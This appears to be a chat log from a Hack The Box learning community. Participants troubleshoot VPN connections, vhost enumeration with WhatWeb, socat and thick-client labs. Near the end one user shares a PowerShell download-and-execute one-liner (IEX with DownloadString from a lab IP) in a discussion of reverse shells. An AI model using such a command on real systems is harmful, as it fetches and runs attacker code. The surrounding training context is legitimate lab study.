@mild python please avoid posting content that could be considered spoilers for others. Take questions like that to DM's for those that are willing to give you advice.

I have a problem connecting to the vpn I tried all the possible commands

I need a help @ocean night

Please reach out to our support department at https://help.hackthebox.com, or browse this article to try and come to a solution yourself https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

I reached them but nothing

I tried all the possible options

Then you'll just need to wait for them to respond I'm afraid

I'm not here as a support agent, I'm sorry

Warning : compression for receiving.......

That's a warning not an error

But it doesn't work at all

At the tail end of that do you see "initialization sequence completed"?

Are you running it with sudo?

Yes

I'm not support, and did not ask you to dm me

Just to send u the pic if u have any help

Your pic you dmed shows me it connected

Why there is no ping ??

¯_(ツ)_/¯

spin up the target box and ping it

yeah think that makes sense

thanks guys

If you do ip a do you only have one tun interface?

Nothing returned

Also different vpns for different portions of htb

Starting-point is different from labs is different from academy

No 20

for the academy vpn i always download the config file every time i spin up a target

20?

Then that's your problem

It doesn't know how to route traffic to you bc you have 20 ovpn processes running

20 tun interfaces?

sudo killall openvpn

Then run the vpn connection again

If you see "initialization sequence completed" then it's connected

Still 20 tun

I did

This is for information gathering web edition module. The section is Active Infrastructure Identification.

I am trying to use WhatWeb to figure out the CMS used on app.inlanefreight.local. Its a one word answer. I thought it was Apache but its not. I know the OS used for inlanefreight.local and I know the Apache version.

How do I find the content management system?

So after killing all openvpn processes it still isn't working?

Restart your vm and then try again

I think that I should ping the tun Ip add not thee one on htb

?

The tun ip is the ip assigned to you by the vpn

Apache is the web server running, not the CMS

right I know how do I find the CMS?

When I ping the target ip there is no result when I pinged the tun it worked

unfortunately, i don't have the notes for the module

Because that’s you..

can you browse the website?

I know

And that's the problem

Do you though

yes let me try something

The problem is you have 20 tun interfaces

ps aux | grep openvpn

you can look up the most popular CMSes and try to look for those on the site or in the html source

Thanks alot it works

?

🤦‍♂️

That command is to show how many openvpn processes are running

If there's more than 1 (excluding grep) that's a problem

I mean I killed all the openvpn then tried again and it worked to ping it

So what I told you to do 10 minutes ago

We should apply -9 in order to kill all the processes related to openvpn ,cause kilall just remove one process

It should kill all labeled openvpn but whatever works for you

Thanks again for ur help

ok I am browsing website and I tried curl -I and its not getting me anything and online resources can't identify it because its a private IP address

view source doesn't show me the CMS

You can still use curl with private ips

¯_(ツ)_/¯

You need to add the hosts entries stated above the questions

(to the /etc/hosts file)

Also this ^

I know but I did and the CMS didn't show up

I did curl -I

hold on a sec

The answer is there

Whatweb is a good tool for enumerating as well

Funny, that's mentioned in the module, I think?

I tried whatweb already but cms not there

in fact I tried it multiple times

I can tell you it does

ok I will try again

There's a line that explicitly says word! - Open source Content Management

The CMS isn't found with Curl -I

ok

You can use curl to find it, but you'll have to grep for keywords

I'm trying to find it with WhatWeb but this command I'm trying isn't working:

whatweb http://10.129.42.195/ -v --search-plugins="Content" ```

Anybody done the zephyr Pro labs

it gets me all plugins in existence with word content in them and not the ones for that IP

Its driving me crazy how stuck I am I don't understand

Because you need to use the vhost

The thing I'm supposed to do works in other environments

#prolabs-zephyr read and follow #welcome to access

#welcome verify yourself and yoi get access to #prolabs-zephyr zephyr chat

Im on mobile, you're too slow

faking me

Im on mobile too

Skill issue then

Had to look whats the chamnel for zehpyr first

Also it might not be plug-ins. Just do the -a3 -v as shown

Learn to swipe.

ok

but I did that and I didn't see the cms

#prolabs- is usually how they start

Look for the words "content management, also: you NEED TO USE THE VHOST

app.inlanefreight.local

Yes, add that to /etc/hosts

As this ip is hosting 2 hosts, app.inlanefreight.local and dev.inlanefreight.local

Thank God the sun is out today.

┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 http://app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local

Each question tells you which to look at

ok but how do I set vhost

It needs to be in your /etc/hosts

ok got it

As I told him 2 minutes ago...lol

ip host1 host2 host3...

I am trying to use socat on windows I am getting this error I tried putting my firewall down but it did not help

 .\socat.exe TCP-LISTEN:8000,fork TCP:127.0.0.1:1337
2024/04/25 02:48:36 socat[16964] E connect(5, AF=2 127.0.0.1:1337, 16): Connection refused

And was told to him earlier

But he listens to you and not me 😔

Oh wow...lol

G0blin even told him lmfao

Password Attacks is almost over for me.

The hard lab was the most fun for me imo

Yeah, I'm a bit intimidated by the labs but I'll make it. I just hate having to use RDP.

It's clunky.

use tcp vpn and just let the lab sit for a few minutes before touching it ¯_(ツ)_/¯

Is there a way to convert a CMD reverse shell to Powershell?

Im doing 1 section per day lol but for now didnt had any problems at password attacks(luckily i saw it many times marcie saying dont attack ssh on mitations lol) saved me a grey hair

so I have the hosts file open and I'm thinking I put it at the bottom?

powershell

Just add powershell

That helps 🙂

hello?

Hello, we hear you @sterile epoch ! 😉

What module?

attacking common applications thick clients

Potentially 1337 is already in use

¯_(ツ)_/¯

I checked in resource monitor

any idea about this?

Or you meant a cmd reverse code that would work via powershell terminal? Dont think so? I could be wrong.

solved it

Not that i can think of any.

I tried in both my local machine and the remote foothold

Yeah I'm wondering if you can convert CMD into Powershell while connected to an endpoint via reverse shell.

Just type powershell and it drops you into a powershell session

Not that i know of. I mean you can run powershell stuff in cmd with an example

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')"

(Mypowershell.ps1 long ass code)

But revershe shell thats the same in cmd and powershell, not that i know off

I first decompiled the jar file > removed the deleted the 2 files in META-INF > removed the hashes from MANIFEST.MF > changed the port from 8000 to 1337 and then used the command jar -cmf .\META-INF\MANIFEST.MF ..\fatty_mod.jar *
I get the error htb.client.run.Starter not found

Party time 🥳

Is this CWEE...?!

CPTS

Damn...

I can't wait to get to that part.

Such a good value.

I agree but this particular module is taking me more than a month

I just hope they dont throw any thick applications in the exam

What...?!

What's your background?

A B.tech graduate

no work experience

I see. Yeah that's a tough segue.

But hey, when you're done with this cert you'll be a hacker 🙂

I think you need several certs before you can really call yourself that

tbh its not even certs that would do that

Nah.

true

you don't need any certs to be a hacker

I think to be considered an actual hacker, you need well-rounded skills not certs